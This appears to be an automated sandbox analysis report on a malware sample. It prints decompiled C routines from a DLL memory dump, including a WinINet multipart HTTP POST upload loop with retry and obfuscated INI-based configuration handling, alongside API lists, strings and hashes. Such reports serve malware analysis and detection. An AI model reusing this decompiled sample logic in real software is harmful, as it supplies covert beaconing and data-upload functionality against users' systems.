                                                                                                                        					_t111 = E6F3354E0(_t122,  *((intOrPtr*)(_t154 + 0x14)), _t103);
                                                                                                                        					_t156 = _t156 + 0xc;
                                                                                                                        					if(_t111 !=  *((intOrPtr*)(_t154 + 0x18))) {
                                                                                                                        						goto L19;
                                                                                                                        					}
                                                                                                                        					goto L13;
                                                                                                                        				}
                                                                                                                        			}






























                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3356A1
                                                                                                                        • InternetOpenA.WININET(00749BB0,00000001,00000000,00000000,00000000), ref: 6F3356E8
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 6F335714
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000005,?,00000004), ref: 6F335720
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000006,?,00000004), ref: 6F33572C
                                                                                                                        • InternetConnectA.WININET(00000000,?,-00000050,00000000,00000000,00000003,00000000,00000000), ref: 6F33574E
                                                                                                                        • HttpOpenRequestA.WININET(00000000,POST,00000001,HTTP/1.1,00000000,00000000,84AA3300,00000000), ref: 6F33577C
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800), ref: 6F335793
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3357A0
                                                                                                                        • wsprintfA.USER32 ref: 6F3357B7
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F3357C8
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3357DC
                                                                                                                        • RtlRandom.NTDLL(?), ref: 6F3357EB
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F3357FC
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335803
                                                                                                                        • wsprintfA.USER32 ref: 6F335823
                                                                                                                        • wsprintfA.USER32 ref: 6F33583E
                                                                                                                        • wsprintfA.USER32 ref: 6F335860
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F335871
                                                                                                                        • wsprintfA.USER32 ref: 6F335882
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F335893
                                                                                                                        • HttpSendRequestExA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 6F3358A2
                                                                                                                        • HttpEndRequestA.WININET(00000000,00000000,00000000,00000000), ref: 6F335953
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335978
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F33597F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335988
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F33598F
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F33599A
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F3359A5
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F3359AC
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3359BD
                                                                                                                        • Sleep.KERNEL32(00001388), ref: 6F3359CC
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F3359D7
                                                                                                                        Strings
                                                                                                                        • N, xrefs: 6F33570C
                                                                                                                        • POST, xrefs: 6F335776
                                                                                                                        • ----------%lu--, xrefs: 6F335834
                                                                                                                        • HTTP/1.1, xrefs: 6F335770
                                                                                                                        • Connection: close, xrefs: 6F3357AC
                                                                                                                        • Content-Type: multipart/form-data; boundary=--------%lu, xrefs: 6F33587C
                                                                                                                        • ----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary, xrefs: 6F335819
                                                                                                                        • Content-Length: %lu, xrefs: 6F33585A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInternet$HttpRequest$wsprintf$Process$CloseCountHandleHeadersOptionTick$AllocFreeOpen$ConnectErrorLastRandomSendSleep
                                                                                                                        • String ID: N$----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary$----------%lu--$Connection: close$Content-Length: %lu$Content-Type: multipart/form-data; boundary=--------%lu$HTTP/1.1$POST
                                                                                                                        • API String ID: 2546452625-2948876467
                                                                                                                        • Opcode ID: 7ea32a9263ea2d0d4593151da6547690d3d73eaba6db73f7a05648d3d57ff80b
                                                                                                                        • Instruction ID: f412cc8f9967b57926f4c2b9cbef0be47c390b5ab26ad302e6127e584bc072b0
                                                                                                                        • Opcode Fuzzy Hash: 7ea32a9263ea2d0d4593151da6547690d3d73eaba6db73f7a05648d3d57ff80b
                                                                                                                        • Instruction Fuzzy Hash: A5A1CFB290438AAFD750DF24CC89F6B7BEDEF89725F00051CFA4596180DB74E8548BA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E6F3356B3() {
                                                                                                                        				char* _t65;
                                                                                                                        				long _t81;
                                                                                                                        				void* _t94;
                                                                                                                        				intOrPtr _t96;
                                                                                                                        				void* _t97;
                                                                                                                        				void* _t98;
                                                                                                                        				void* _t99;
                                                                                                                        				void* _t101;
                                                                                                                        				void* _t102;
                                                                                                                        				void* _t103;
                                                                                                                        				void* _t105;
                                                                                                                        				CHAR* _t108;
                                                                                                                        				int _t109;
                                                                                                                        				long _t110;
                                                                                                                        				long _t113;
                                                                                                                        				void* _t117;
                                                                                                                        				intOrPtr _t141;
                                                                                                                        				void* _t143;
                                                                                                                        				void* _t145;
                                                                                                                        				intOrPtr _t146;
                                                                                                                        				void* _t148;
                                                                                                                        				void* _t149;
                                                                                                                        				int _t151;
                                                                                                                        				intOrPtr _t152;
                                                                                                                        				void* _t154;
                                                                                                                        				void* _t156;
                                                                                                                        
                                                                                                                        				while(1) {
                                                                                                                        					_t146 =  *((intOrPtr*)(_t154 + 0x40));
                                                                                                                        					 *(_t154 + 0x18) = 0x842a0000;
                                                                                                                        					if( *(_t146 + 0xc) != 0) {
                                                                                                                        						 *(_t154 + 0x18) = 0x84aa3300;
                                                                                                                        					}
                                                                                                                        					_t65 = M6F340518; // 0x749bb0
                                                                                                                        					_t149 = InternetOpenA(_t65, 1, 0, 0, 0);
                                                                                                                        					 *(_t154 + 0x30) = _t149;
                                                                                                                        					if(_t149 == 0) {
                                                                                                                        						L28:
                                                                                                                        						if(GetTickCount() >= _t141) {
                                                                                                                        							L32:
                                                                                                                        							return  *((intOrPtr*)(_t154 + 0x20));
                                                                                                                        						}
                                                                                                                        						Sleep(0x1388);
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					 *((intOrPtr*)(_t154 + 0x20)) = 0x4e20;
                                                                                                                        					InternetSetOptionA(_t149, 2, _t154 + 0x14, 4);
                                                                                                                        					InternetSetOptionA(_t149, 5, _t154 + 0x14, 4);
                                                                                                                        					InternetSetOptionA(_t149, 6, _t154 + 0x14, 4);
                                                                                                                        					asm("sbb ecx, ecx");
                                                                                                                        					_t143 = InternetConnectA(_t149,  *(_t146 + 4), ( ~( *(_t146 + 0xc)) & 0x0000016b) + 0x50, 0, 0, 3, 0, 0);
                                                                                                                        					 *(_t154 + 0x34) = _t143;
                                                                                                                        					if(_t143 == 0) {
                                                                                                                        						L26:
                                                                                                                        						InternetCloseHandle(_t149);
                                                                                                                        						if( *(_t154 + 0x1c) != 0) {
                                                                                                                        							goto L32;
                                                                                                                        						}
                                                                                                                        						_t141 =  *((intOrPtr*)(_t154 + 0x38));
                                                                                                                        						goto L28;
                                                                                                                        					}
                                                                                                                        					_t117 = HttpOpenRequestA(_t143, "POST",  *(_t146 + 8), "HTTP/1.1", 0, 0,  *(_t154 + 0x18), 0);
                                                                                                                        					if(_t117 == 0) {
                                                                                                                        						L25:
                                                                                                                        						InternetCloseHandle(_t143);
                                                                                                                        						goto L26;
                                                                                                                        					}
                                                                                                                        					_t148 = HeapAlloc(GetProcessHeap(), 8, 0x800);
                                                                                                                        					if(_t148 == 0) {
                                                                                                                        						L24:
                                                                                                                        						InternetCloseHandle(_t117);
                                                                                                                        						_t143 =  *(_t154 + 0x34);
                                                                                                                        						goto L25;
                                                                                                                        					}
                                                                                                                        					_t81 = wsprintfA(_t148, "%s", "Connection: close\r\n");
                                                                                                                        					_t154 = _t154 + 0xc;
                                                                                                                        					HttpAddRequestHeadersA(_t117, _t148, _t81, 0xa0000000);
                                                                                                                        					_t151 = 0;
                                                                                                                        					 *((intOrPtr*)(_t154 + 0x24)) = 0;
                                                                                                                        					 *((intOrPtr*)(_t154 + 0x28)) = 0;
                                                                                                                        					 *(_t154 + 0x18) = 0;
                                                                                                                        					 *(_t154 + 0x30) = GetTickCount();
                                                                                                                        					 *(_t154 + 0x1c) = RtlRandom(_t154 + 0x2c);
                                                                                                                        					_t145 = HeapAlloc(GetProcessHeap(), 8, 0x800);
                                                                                                                        					if(_t145 != 0) {
                                                                                                                        						 *(_t154 + 0x34) = _t145;
                                                                                                                        						_t151 = wsprintfA(_t145, "----------%lu\r\nContent-Disposition: form-data; name=\"%s\"\r\nContent-Type: text/plain\r\nContent-Transfer-Encoding: binary\r\n\r\n",  *(_t154 + 0x14),  *(_t154 + 0x44));
                                                                                                                        						_t26 = _t151 + 1; // 0x1
                                                                                                                        						_t108 = _t145 + _t26;
                                                                                                                        						 *(_t154 + 0x44) = _t108;
                                                                                                                        						_t109 = wsprintfA(_t108, "----------%lu--\r\n\r\n",  *((intOrPtr*)(_t154 + 0x24)));
                                                                                                                        						_t128 =  *((intOrPtr*)(_t154 + 0x5c));
                                                                                                                        						 *(_t154 + 0x34) = _t109;
                                                                                                                        						_t110 = wsprintfA(_t148, "Content-Length: %lu\r\n",  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x5c)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x5c)) + 0x20)) +  *((intOrPtr*)(_t128 + 0x18)) + _t109 + _t151);
                                                                                                                        						_t156 = _t154 + 0x28;
                                                                                                                        						HttpAddRequestHeadersA(_t117, _t148, _t110, 0xa0000000);
                                                                                                                        						_t113 = wsprintfA(_t148, "Content-Type: multipart/form-data; boundary=--------%lu\r\n",  *((intOrPtr*)(_t156 + 0x14)));
                                                                                                                        						_t154 = _t156 + 0xc;
                                                                                                                        						HttpAddRequestHeadersA(_t117, _t148, _t113, 0xa0000000);
                                                                                                                        					}
                                                                                                                        					if(HttpSendRequestExA(_t117, 0, 0, 0, 0) == 0) {
                                                                                                                        						if(GetLastError() == 0x2f7d) {
                                                                                                                        							 *( *((intOrPtr*)(_t154 + 0x40)) + 0xc) = 0;
                                                                                                                        						}
                                                                                                                        						L21:
                                                                                                                        						if(_t145 != 0) {
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t145);
                                                                                                                        						}
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t148);
                                                                                                                        						_t149 =  *(_t154 + 0x30);
                                                                                                                        						goto L24;
                                                                                                                        					}
                                                                                                                        					 *((intOrPtr*)(_t154 + 0x20)) = _t151;
                                                                                                                        					_t94 = E6F3354E0(_t117,  *((intOrPtr*)(_t154 + 0x24)), _t154 + 0x14);
                                                                                                                        					_t154 = _t154 + 0xc;
                                                                                                                        					_t152 =  *((intOrPtr*)(_t154 + 0x40));
                                                                                                                        					if(_t94 != _t151) {
                                                                                                                        						L19:
                                                                                                                        						HttpEndRequestA(_t117, 0, 0, 0);
                                                                                                                        						if( *(_t154 + 0x1c) != 0) {
                                                                                                                        							_t96 = E6F335540(_t117, _t152 + 0x2c);
                                                                                                                        							_t154 = _t154 + 8;
                                                                                                                        							 *((intOrPtr*)(_t154 + 0x20)) = _t96;
                                                                                                                        						}
                                                                                                                        						goto L21;
                                                                                                                        					}
                                                                                                                        					_t97 = _t152 + 0x18;
                                                                                                                        					if( *((intOrPtr*)(_t152 + 0x18)) == 0) {
                                                                                                                        						L13:
                                                                                                                        						_t98 = _t152 + 0x20;
                                                                                                                        						if( *((intOrPtr*)(_t152 + 0x20)) == 0) {
                                                                                                                        							L15:
                                                                                                                        							_t99 = _t152 + 0x28;
                                                                                                                        							if( *((intOrPtr*)(_t152 + 0x28)) == 0) {
                                                                                                                        								L17:
                                                                                                                        								 *(_t154 + 0x30) =  *(_t154 + 0x18);
                                                                                                                        								_t101 = E6F3354E0(_t117,  *((intOrPtr*)(_t154 + 0x28)), _t154 + 0x24);
                                                                                                                        								_t154 = _t154 + 0xc;
                                                                                                                        								if(_t101 ==  *(_t154 + 0x18)) {
                                                                                                                        									 *(_t154 + 0x1c) = 1;
                                                                                                                        								}
                                                                                                                        								goto L19;
                                                                                                                        							}
                                                                                                                        							_t102 = E6F3354E0(_t117,  *((intOrPtr*)(_t152 + 0x24)), _t99);
                                                                                                                        							_t154 = _t154 + 0xc;
                                                                                                                        							if(_t102 !=  *((intOrPtr*)(_t152 + 0x28))) {
                                                                                                                        								goto L19;
                                                                                                                        							}
                                                                                                                        							goto L17;
                                                                                                                        						}
                                                                                                                        						_t103 = E6F3354E0(_t117,  *((intOrPtr*)(_t152 + 0x1c)), _t98);
                                                                                                                        						_t154 = _t154 + 0xc;
                                                                                                                        						if(_t103 !=  *((intOrPtr*)(_t152 + 0x20))) {
                                                                                                                        							goto L19;
                                                                                                                        						}
                                                                                                                        						goto L15;
                                                                                                                        					}
                                                                                                                        					_t105 = E6F3354E0(_t117,  *((intOrPtr*)(_t152 + 0x14)), _t97);
                                                                                                                        					_t154 = _t154 + 0xc;
                                                                                                                        					if(_t105 !=  *((intOrPtr*)(_t152 + 0x18))) {
                                                                                                                        						goto L19;
                                                                                                                        					}
                                                                                                                        					goto L13;
                                                                                                                        				}
                                                                                                                        			}





























                                                                                                                        0x6f3358cd
                                                                                                                        0x6f33594c
                                                                                                                        0x6f335953
                                                                                                                        0x6f33595e
                                                                                                                        0x6f335965
                                                                                                                        0x6f33596a
                                                                                                                        0x6f33596d
                                                                                                                        0x6f33596d
                                                                                                                        0x00000000
                                                                                                                        0x6f33595e
                                                                                                                        0x6f3358d3
                                                                                                                        0x6f3358d6
                                                                                                                        0x6f3358eb
                                                                                                                        0x6f3358ef
                                                                                                                        0x6f3358f2
                                                                                                                        0x6f335907
                                                                                                                        0x6f33590b
                                                                                                                        0x6f33590e
                                                                                                                        0x6f335923
                                                                                                                        0x6f335932
                                                                                                                        0x6f335936
                                                                                                                        0x6f33593b
                                                                                                                        0x6f335942
                                                                                                                        0x6f335944
                                                                                                                        0x6f335944
                                                                                                                        0x00000000
                                                                                                                        0x6f335942
                                                                                                                        0x6f335916
                                                                                                                        0x6f33591b
                                                                                                                        0x6f335921
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335921
                                                                                                                        0x6f3358fa
                                                                                                                        0x6f3358ff
                                                                                                                        0x6f335905
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335905
                                                                                                                        0x6f3358de
                                                                                                                        0x6f3358e3
                                                                                                                        0x6f3358e9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3358e9

                                                                                                                        APIs
                                                                                                                        • InternetOpenA.WININET(00749BB0,00000001,00000000,00000000,00000000), ref: 6F3356E8
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 6F335714
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000005,?,00000004), ref: 6F335720
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000006,?,00000004), ref: 6F33572C
                                                                                                                        • InternetConnectA.WININET(00000000,?,-00000050,00000000,00000000,00000003,00000000,00000000), ref: 6F33574E
                                                                                                                        • HttpOpenRequestA.WININET(00000000,POST,00000001,HTTP/1.1,00000000,00000000,84AA3300,00000000), ref: 6F33577C
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800), ref: 6F335793
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3357A0
                                                                                                                        • wsprintfA.USER32 ref: 6F3357B7
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F3357C8
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3357DC
                                                                                                                        • RtlRandom.NTDLL(?), ref: 6F3357EB
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F3357FC
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335803
                                                                                                                        • wsprintfA.USER32 ref: 6F335823
                                                                                                                        • wsprintfA.USER32 ref: 6F33583E
                                                                                                                        • wsprintfA.USER32 ref: 6F335860
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F335871
                                                                                                                        • wsprintfA.USER32 ref: 6F335882
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F335893
                                                                                                                        • HttpSendRequestExA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 6F3358A2
                                                                                                                        • HttpEndRequestA.WININET(00000000,00000000,00000000,00000000), ref: 6F335953
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335978
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F33597F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335988
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F33598F
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F33599A
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F3359A5
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F3359AC
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3359BD
                                                                                                                        • Sleep.KERNEL32(00001388), ref: 6F3359CC
                                                                                                                        Strings
                                                                                                                        • N, xrefs: 6F33570C
                                                                                                                        • POST, xrefs: 6F335776
                                                                                                                        • ----------%lu--, xrefs: 6F335834
                                                                                                                        • HTTP/1.1, xrefs: 6F335770
                                                                                                                        • Connection: close, xrefs: 6F3357AC
                                                                                                                        • Content-Type: multipart/form-data; boundary=--------%lu, xrefs: 6F33587C
                                                                                                                        • ----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary, xrefs: 6F335819
                                                                                                                        • Content-Length: %lu, xrefs: 6F33585A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInternet$HttpRequest$wsprintf$Process$CloseHandleHeadersOption$AllocCountFreeOpenTick$ConnectRandomSendSleep
                                                                                                                        • String ID: N$----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary$----------%lu--$Connection: close$Content-Length: %lu$Content-Type: multipart/form-data; boundary=--------%lu$HTTP/1.1$POST
                                                                                                                        • API String ID: 1438124730-2948876467
                                                                                                                        • Opcode ID: df19d0c201741c97b306c486ca984b4fc86e0f28d2163465dfd1d885eac4ca06
                                                                                                                        • Instruction ID: 2d51272c1173d9ffcb8a03b69d0064296ed9a9be5b73b236c802b838761fdf0f
                                                                                                                        • Opcode Fuzzy Hash: df19d0c201741c97b306c486ca984b4fc86e0f28d2163465dfd1d885eac4ca06
                                                                                                                        • Instruction Fuzzy Hash: A291B0B290478AAFD760DF24CC89F6B77ADEF88725F00050CFA4596181DB74F8548BA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E6F336A90(CHAR* _a4, intOrPtr _a8) {
                                                                                                                        				void _v264;
                                                                                                                        				char _v266;
                                                                                                                        				char _v267;
                                                                                                                        				char _v268;
                                                                                                                        				char _v271;
                                                                                                                        				char _v272;
                                                                                                                        				char _v273;
                                                                                                                        				char _v274;
                                                                                                                        				short _v275;
                                                                                                                        				char _v276;
                                                                                                                        				void* _t53;
                                                                                                                        				CHAR* _t55;
                                                                                                                        				CHAR* _t56;
                                                                                                                        				CHAR* _t59;
                                                                                                                        				CHAR* _t60;
                                                                                                                        				CHAR* _t62;
                                                                                                                        				CHAR* _t70;
                                                                                                                        				CHAR* _t72;
                                                                                                                        				CHAR* _t73;
                                                                                                                        				int _t74;
                                                                                                                        				CHAR* _t75;
                                                                                                                        				CHAR* _t76;
                                                                                                                        				CHAR* _t78;
                                                                                                                        				CHAR* _t80;
                                                                                                                        				char _t81;
                                                                                                                        				void* _t83;
                                                                                                                        				void* _t85;
                                                                                                                        				CHAR* _t86;
                                                                                                                        				void* _t88;
                                                                                                                        				char _t97;
                                                                                                                        				CHAR* _t103;
                                                                                                                        				CHAR* _t104;
                                                                                                                        				CHAR* _t105;
                                                                                                                        				int _t108;
                                                                                                                        				CHAR* _t110;
                                                                                                                        				CHAR* _t113;
                                                                                                                        				CHAR* _t121;
                                                                                                                        				CHAR* _t122;
                                                                                                                        				CHAR* _t123;
                                                                                                                        				CHAR* _t124;
                                                                                                                        				CHAR* _t132;
                                                                                                                        				int _t133;
                                                                                                                        				int _t135;
                                                                                                                        				CHAR* _t139;
                                                                                                                        
                                                                                                                        				_t139 = _a4;
                                                                                                                        				if(_t139 != 0) {
                                                                                                                        					_t88 = _t139[4];
                                                                                                                        					if(_t88 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t88);
                                                                                                                        					}
                                                                                                                        					_t53 = _t139[8];
                                                                                                                        					if(_t53 != 0) {
                                                                                                                        						_t53 = HeapFree(GetProcessHeap(), 0, _t53);
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				if(_a8 != 0) {
                                                                                                                        					return _t53;
                                                                                                                        				} else {
                                                                                                                        					if(_t139 == 0) {
                                                                                                                        						_t86 = M6F3404CC; // 0x99d818
                                                                                                                        						_t132 = M6F3404DC; // 0x99b1c8
                                                                                                                        						_v268 = 0x67;
                                                                                                                        						_v267 = 0x64;
                                                                                                                        						_v266 = 0;
                                                                                                                        						WritePrivateProfileStringA(_t132,  &_v268, _t139, _t86);
                                                                                                                        					}
                                                                                                                        					_v275 = 0x64;
                                                                                                                        					asm("sbb bl, bl");
                                                                                                                        					_t97 = ( ~_t139 & 0x000000f5) + 0x6e;
                                                                                                                        					_v273 = 0;
                                                                                                                        					_v276 = 0x68;
                                                                                                                        					_v274 = _t97;
                                                                                                                        					E6F331D30(0x6f340034);
                                                                                                                        					_t55 = M6F3404CC; // 0x99d818
                                                                                                                        					_t56 = M6F3404DC; // 0x99b1c8
                                                                                                                        					_t133 = GetPrivateProfileStringA(_t56,  &_v276, 0x6f340034,  &_v264, 0x104, _t55);
                                                                                                                        					E6F331D30(0x6f340034);
                                                                                                                        					if(_t139 == 0) {
                                                                                                                        						_t59 = M6F3404CC; // 0x99d818
                                                                                                                        						_t60 = M6F3404DC; // 0x99b1c8
                                                                                                                        						_v274 = 0x63;
                                                                                                                        						WritePrivateProfileStringA(_t60,  &_v276,  &_v264, _t59);
                                                                                                                        						_t103 = M6F3404CC; // 0x99d818
                                                                                                                        						_t62 = M6F3404DC; // 0x99b1c8
                                                                                                                        						_v274 = 0x6e;
                                                                                                                        						WritePrivateProfileStringA(_t62,  &_v276, 0, _t103);
                                                                                                                        					} else {
                                                                                                                        						_t15 = _t133 + 1; // 0x1
                                                                                                                        						_t85 = HeapAlloc(GetProcessHeap(), 8, _t15);
                                                                                                                        						_t139[4] = _t85;
                                                                                                                        						RtlMoveMemory(_t85,  &_v264, _t133);
                                                                                                                        						 *_t139 = _t133;
                                                                                                                        					}
                                                                                                                        					_v275 = 0x70;
                                                                                                                        					_v274 = _t97;
                                                                                                                        					E6F331D30(0x6f340010);
                                                                                                                        					_t104 = M6F3404CC; // 0x99d818
                                                                                                                        					_t105 = M6F3404DC; // 0x99b1c8
                                                                                                                        					_t135 = GetPrivateProfileStringA(_t105,  &_v276, 0x6f340010,  &_v264, 0x104, _t104);
                                                                                                                        					E6F331D30(0x6f340010);
                                                                                                                        					if(_t139 == 0) {
                                                                                                                        						_t121 = M6F3404CC; // 0x99d818
                                                                                                                        						_t122 = M6F3404DC; // 0x99b1c8
                                                                                                                        						_v274 = 0x63;
                                                                                                                        						WritePrivateProfileStringA(_t122,  &_v276,  &_v264, _t121);
                                                                                                                        						_t70 = M6F3404CC; // 0x99d818
                                                                                                                        						_t123 = M6F3404DC; // 0x99b1c8
                                                                                                                        						_v274 = 0x6e;
                                                                                                                        						WritePrivateProfileStringA(_t123,  &_v276, 0, _t70);
                                                                                                                        					} else {
                                                                                                                        						_t27 = _t135 + 1; // 0x1
                                                                                                                        						_t83 = HeapAlloc(GetProcessHeap(), 8, _t27);
                                                                                                                        						_t139[8] = _t83;
                                                                                                                        						RtlMoveMemory(_t83,  &_v264, _t135);
                                                                                                                        					}
                                                                                                                        					_t72 = M6F3404CC; // 0x99d818
                                                                                                                        					_t108 =  *0x6f34000c; // 0x1
                                                                                                                        					_t73 = M6F3404DC; // 0x99b1c8
                                                                                                                        					_t124 =  &_v276;
                                                                                                                        					_v274 = _t97;
                                                                                                                        					_v275 = 0x73;
                                                                                                                        					_t74 = GetPrivateProfileIntA(_t73, _t124, _t108, _t72);
                                                                                                                        					if(_t139 != 0) {
                                                                                                                        						_v275 = 0x74;
                                                                                                                        						_t139[0xc] = 0 | _t74 != 0x00000000;
                                                                                                                        						_t113 = M6F3404CC; // 0x99d818
                                                                                                                        						_t80 = M6F3404DC; // 0x99b1c8
                                                                                                                        						_t81 = GetPrivateProfileIntA(_t80,  &_v276, 0xc, _t113);
                                                                                                                        						_t139[0x10] = _t81;
                                                                                                                        						return _t81;
                                                                                                                        					}
                                                                                                                        					_t75 = M6F3404CC; // 0x99d818
                                                                                                                        					_t76 = M6F3404DC; // 0x99b1c8
                                                                                                                        					_v272 = (_t124 & 0xffffff00 | _t74 == 0x00000001) + 0x30;
                                                                                                                        					_v271 = 0;
                                                                                                                        					_v274 = 0x63;
                                                                                                                        					WritePrivateProfileStringA(_t76,  &_v276,  &_v272, _t75);
                                                                                                                        					_t110 = M6F3404CC; // 0x99d818
                                                                                                                        					_t78 = M6F3404DC; // 0x99b1c8
                                                                                                                        					_v274 = 0x6e;
                                                                                                                        					return WritePrivateProfileStringA(_t78,  &_v276, 0, _t110);
                                                                                                                        				}
                                                                                                                        			}
















































                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000), ref: 6F336AB3
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336ABA
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000001,00000000,00000000), ref: 6F336AC6
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336ACD
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(0099B1C8,?,?,0099D818), ref: 6F336B05
                                                                                                                        • GetPrivateProfileStringA.KERNEL32(0099B1C8,?,6F340034,?,00000104,0099D818), ref: 6F336B5D
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001), ref: 6F336B78
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F336B7F
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 6F336B8F
                                                                                                                        • WritePrivateProfileStringA.KERNEL32 ref: 6F336BB9
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(0099B1C8,?,00000000,0099D818), ref: 6F336BD4
                                                                                                                        • GetPrivateProfileStringA.KERNEL32(0099B1C8,?,6F340010,?,00000104,0099D818), ref: 6F336C0E
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001), ref: 6F336C2A
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F336C31
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 6F336C41
                                                                                                                        • WritePrivateProfileStringA.KERNEL32 ref: 6F336C71
